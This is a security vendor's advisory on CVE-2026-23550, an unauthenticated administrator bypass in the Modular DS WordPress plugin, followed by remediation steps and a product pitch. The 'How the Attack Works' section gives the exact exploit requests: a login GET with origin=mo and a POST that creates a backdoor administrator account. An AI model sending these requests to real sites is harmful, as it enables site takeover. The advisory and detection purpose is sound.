Nyambush
CVSS 10.0Critical

CVE-2026-23550: Modular DS Authentication Bypass (CVSS 10.0)

Overview

  • CVE: CVE-2026-23550
  • Plugin: Modular DS (WordPress connector plugin)
  • Affected Versions: All versions up to and including 2.5.1
  • Patched Version: 2.5.2
  • CVSS: 10.0 (Critical - maximum score)
  • Authentication: None required (unauthenticated attack)
  • Type: Authentication Bypass / Unauthenticated Privilege Escalation
  • Exploited in the Wild: Yes - attacks observed from January 13, 2026

This vulnerability carries the maximum possible CVSS score of 10.0 and has been actively exploited in the wild. Modular DS is a WordPress connector plugin used to integrate sites with the Modular service, with approximately 40,000 active installations. An attacker can obtain administrator access with a single HTTP GET request, and real-world attacks were detected within hours of the vulnerability becoming publicly known.

What Happened

The Modular DS plugin provides a login route at /login/{modular_request} to connect WordPress sites to Modular's services. This route was implemented with a "direct request" mode for internal use, but the validation of conditions required to enter that mode was fundamentally absent.

Specifically, simply including an origin=mo parameter alongside any type parameter in a request was sufficient to bypass the entire authentication layer. The plugin misidentified this combination as a "trusted internal request" and automatically logged the requester in as a WordPress administrator.

What makes this vulnerability particularly dangerous is that it requires zero prior knowledge or credentials, and administrator access can be obtained with a single, trivially simple HTTP request.

How the Attack Works

The attack sequence requires almost no technical skill.

Step 1: GET request to the login API

GET /api/modular-connector/login/?origin=mo&type=any HTTP/1.1
Host: target-wordpress-site.com

This single request completely bypasses the plugin's authentication checks. The value of the type parameter is irrelevant. The server authenticates the attacker as an administrator and issues a session cookie.

Step 2: Create a backdoor administrator account

POST /wp-admin/user-new.php HTTP/1.1
Host: target-wordpress-site.com
Cookie: [session obtained in step 1]

action=createuser&user_login=backdoor&user_pass=P@ssw0rd&role=administrator

Immediately after obtaining the session, attackers create a new administrator account. This ensures their access persists even if the vulnerable plugin is later removed or patched.

In observed attacks, steps 1 and 2 were completed within minutes of each other, demonstrating that fully automated scripts were driving the exploitation campaign.

Real-World Impact

Starting January 13, 2026, attacks exploiting this vulnerability were confirmed worldwide.

  • Approximately 40,000 sites had the vulnerable version of Modular DS installed, making every one of them a potential target
  • Attacks were detected within hours of information about the vulnerability spreading — a stark demonstration that CVSS 10.0 vulnerabilities attract immediate automated exploitation
  • The typical attacker workflow observed in the wild involved creating an administrator account, planting a backdoor file, injecting spam content, and in some cases installing ransomware
  • Many affected site owners did not notice the intrusion immediately, discovering the breach only after some delay
  • Because the plugin bypasses authentication entirely, hardened passwords and two-factor authentication provided no protection whatsoever — standard defenses were rendered completely irrelevant

Fix and Lessons

Fix: Patched in version 2.5.2. Validation logic was added to the direct request mode of the /login/{modular_request} route to verify the legitimacy of the request origin. The origin=mo parameter alone is no longer sufficient to trigger authentication bypass, as internal signature or token verification is now enforced.

Immediate actions to take:

  1. Update Modular DS to version 2.5.2 or later immediately
  2. Review the WordPress admin user list and remove any unrecognized administrator accounts
  3. Inspect server access logs for suspicious requests to /api/modular-connector/login/
  4. Check for backdoor files on the server via FTP or SSH

Lessons:

  1. CVSS 10.0 vulnerabilities are exploited immediately: Automated attacks begin within hours of public disclosure. Patches must be applied the same day they become available
  2. Authentication bypass invalidates all other defenses: No matter how strong your passwords are, they offer no protection when authentication is skipped entirely
  3. Trusted-request logic must be rigorous: Special routes for third-party integrations require thorough authentication validation. Relying solely on a query parameter value to determine request trust is a fatal design flaw
  4. Post-compromise investigation is non-negotiable: Backdoors outlast the deleted plugin. Updating the plugin is necessary but not sufficient — you must also investigate whether the site was already compromised

Detection with Nyambush

Nyambush continuously scans WordPress plugins and their versions, cross-referencing them against CVE databases. If Modular DS version 2.5.1 or earlier is detected, Nyambush immediately raises an alert indicating the critical severity and CVSS score of 10.0.

For vulnerabilities rated CVSS 9.0 and above, the combination of scheduled scans and real-time notifications is essential. When the window between vulnerability disclosure and active exploitation is measured in hours, manual version checks simply cannot keep pace.

When a plugin warning appears in your Nyambush scan results, it is a signal that automated scanners — including those operated by attackers — have already begun probing. Respond to the alert and apply the fix the same day.

Share this article:Post on X

Is your domain secure?

Run a free scan with Nyambush to check your security risks right now.

Back to articles